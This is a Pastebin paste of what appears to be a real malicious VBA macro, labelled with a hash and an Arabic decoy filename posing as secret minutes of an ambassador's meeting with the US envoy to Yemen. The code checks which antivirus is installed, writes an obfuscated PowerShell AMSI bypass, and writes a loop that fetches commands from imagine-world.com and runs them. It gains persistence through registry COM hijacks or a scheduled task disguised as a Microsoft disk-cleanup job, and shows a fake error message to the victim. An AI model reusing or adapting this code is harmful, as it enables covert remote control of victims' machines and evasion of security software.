Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- a65ad679989b3a403eca8d3e7ba442e9
- سري للغاية - مكتب السفير- محاضر اجتماعات السفيرمع المبعوث الأمريكي لليمن-.ppam
- https://imagine-world.com/'+$caughtd
- Sub R1P2W3()
- Buddhao = ""
- Set smalli = GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- Clemensa = "securitycenter2"
- Set prosperousz = GetObject("winmgmts:\\localhost\root\" & Clemensa)
- Set fileds = prosperousz.execquery("select * from antivirusproduct", "wql", 0)
- For Each whipj In fileds
- Buddhao = Buddhao & whipj.DisplayName & " ."
- Next
- Set Personv = CreateObject("Scripting.FileSystemObject")
- Set oldx = Personv.CreateTextFile("C:\ProgramData\eineg.txt")
- If InStr(Buddhao, "Norton") = False Then
- oldx.Write "try{Remove-Module -Name PSReadline -Force}catch{};$rumourm = 'Sys';$rumourm += 'tem.Ma';$rumourm += 'nagement.Au';$rumourm += 'tom';$rumourm += 'ation.';$rumourm += 'A';$rumourm += 'm';$payingo = 's';$payingo += 'i';$payingo += 'Ut';$payingo += 'ils';$possibilitiess = 'In';$vaanl = 'itF';$Characterg = 'ailed';$treasuresv = 'am';$treasuresv += 's';$treasuresv += 'i' ;$questiona = $treasuresv + $possibilitiess + $vaanl + $Characterg ;$Legislaturej = $null;$motorg = $true;$liket = [Ref].Assembly.GetType($rumourm + $payingo).GetField($questiona,'NonPublic,Static');$liket.SetValue($Legislaturej, $motorg);"
- End If
- oldx.Write "function ixv($caughtd){$zen = [Net.WebRequest]::Create('https://imagine-world.com/'+$caughtd);$zen.Method='GET';$zen.UserAgent='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:EXC_28) Gecko/21.40.19.28 Firefox/2.0';$zen.Accept='text/html,application/json;q=0.9,*/*;q=0.8';$zen.ContentLength=0;$Jagy=$zen.GetResponse();$global:status=[int]$Jagy.StatusCode;$Riceb=$Jagy.GetResponseStream();$RicebReader=new-object System.IO.StreamReader $Riceb;$alteny=$RicebReader.ReadToEnd();$RicebReader.Close();$Jagy.Close();return $alteny}while($true){$vinesz=ixv('');if ($global:status -eq 200 -and -not [string]::IsNullOrEmpty($vinesz)){$vinesz=$vinesz.ToString().Substring($vinesz.IndexOf('<p>')+3, $vinesz.LastIndexOf('</p>')-$vinesz.IndexOf('<p>')-3);iex($vinesz)}Get-Random -Minimum 60 -Maximum 100 | start-sleep}"
- oldx.Close
- Pleasec = InStr(Buddhao, "Avast") Or InStr(Buddhao, "AVG") Or InStr(Buddhao, "360")
- If Pleasec Then
- deriveo = 1
- selfr = "C:\ProgramData\prncnfg.txt"
- Else
- deriveo = False
- selfr = "C:\ProgramData\prncnfg.v"
- selfr = selfr & Chr(98)
- selfr = selfr & "s"
- End If
- Set Africanv = Personv.CreateTextFile(selfr)
- Africanv.Write "CreateObject(""Shell.Application"").ShellExecute "
- Africanv.Write """p"
- Africanv.Write "o"
- Africanv.Write "w"
- Africanv.Write "e"
- Africanv.Write "r"
- Africanv.Write "s"
- Africanv.Write "h"
- Africanv.Write "e"
- Africanv.Write "l"
- Africanv.Write "l"","
- Africanv.Write """-C "" & (CreateObject(""Scripting.FileSystemObject"").OpenTextFile(""C:\ProgramData\eineg.txt"").ReadAll),,, 0"
- Africanv.Close
- If deriveo Then
- selfr = "//B //E:v" & Chr(98) & "s" & "cript " & selfr
- Else
- selfr = "//B " & selfr
- End If
- byc = Pleasec Or InStr(Buddhao, "F-Secure") Or InStr(Buddhao, "BitDefender")
- If byc = False Then
- temp = CreateObject("Wscript.Shell").ExpandEnvironmentStrings("%temp%")
- If Buddhao = "Windows Defender ." Then
- Set Africanv = Personv.CreateTextFile(temp & "\gatherNetworkInfo.v" & Chr(98) & "s")
- Africanv.Write "CreateObject(""Wscript.Shell"").RegWrite ""HKCU\Software\Classes\WbemScripting.SWbemLocator\CLSID\"", ""{4757f757-187e-4483-9e1c-c6ff3a16b670}"", ""REG_SZ"":CreateObject(""Wscript.Shell"").RegWrite ""HKCU\Software\Classes\CLSID\{4757f757-187e-4483-9e1c-c6ff3a16b670}\LocalServer32\"", ""wscript.exe " & selfr & """, ""REG_SZ"""
- Africanv.Close
- waitTill = Now() + TimeValue("00:00:01")
- While Now() < waitTill
- DoEvents
- Wend
- CreateObject("Shell.Application").ShellExecute "explorer.exe", temp & "\gatherNetworkInfo.v" & Chr(98) & "s", , , 0
- waitTill = Now() + TimeValue("00:00:01")
- While Now() < waitTill
- DoEvents
- Wend
- On Error Resume Next
- CreateObject("Shell.Application").ShellExecute "cscript.exe", "C:\windows\System32\Printing_Admin_Scripts\en-US\prnport.v" & Chr(98) & "s" & " -g", , , 0
- MsgBox "Something went wrong!" & vbCrLf & "Kindly contact the sender to send you the file again.", vbCritical, "Error"
- Exit Sub
- End If
- Set Africanv = Personv.CreateTextFile(temp & "\gatherNetworkInfo.v" & Chr(98) & "s")
- Africanv.Write "CreateObject(""Wscript.Shell"").RegWrite ""HKCU\Software\Classes\CLSID\{00021400-0000-0000-C000-000000000046}\shell\open\command\"", ""wscript.exe "" & """ & selfr & """, ""REG_SZ"":CreateObject(""Shell.Application"").ShellExecute ""shell:Desktop"",,,, 0"
- Africanv.Close
- waitTill = Now() + TimeValue("00:00:01")
- While Now() < waitTill
- DoEvents
- Wend
- CreateObject("Shell.Application").ShellExecute "explorer.exe", temp & "\gatherNetworkInfo.v" & Chr(98) & "s", , , 0
- MsgBox "Something went wrong!" & vbCrLf & "Kindly contact the sender to send you the file again.", vbCritical, "Error"
- Exit Sub
- End If
- Set Madamg = CreateObject("Schedule.Service")
- Call Madamg.Connect
- Set Newsg = Madamg.NewTask(0)
- Set mapl = Newsg.RegistrationInfo
- mapl.Description = "Maintenance task used by the system to launch a silent auto disk cleanup when running low on free disk space."
- mapl.Author = "Microsoft Corporation"
- mapl.Version = 1
- mapl.Source = "Microsoft Windows"
- mapl.URI = "DiskCleanUp"
- Set looko = Newsg.Settings
- looko.Enabled = True
- looko.DisallowStartIfOnBatteries = False
- looko.StopIfGoingOnBatteries = False
- looko.StartWhenAvailable = True
- looko.MultipleInstances = 3
- looko.AllowHardTerminate = False
- looko.ExecutionTimeLimit = "PT0S"
- Set ribbonsf = Newsg.triggers
- Set salonr = ribbonsf.Create(7)
- Set crownedg = Newsg.Actions.Create(0)
- crownedg.Path = "wscript.exe"
- crownedg.Arguments = selfr
- Call Madamg.GetFolder("\").RegisterTaskDefinition("DiskCleanUp", Newsg, 6, , , 0)
- MsgBox "Something went wrong!" & vbCrLf & "Kindly contact the sender to send you the file again.", vbCritical, "Error"
- End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement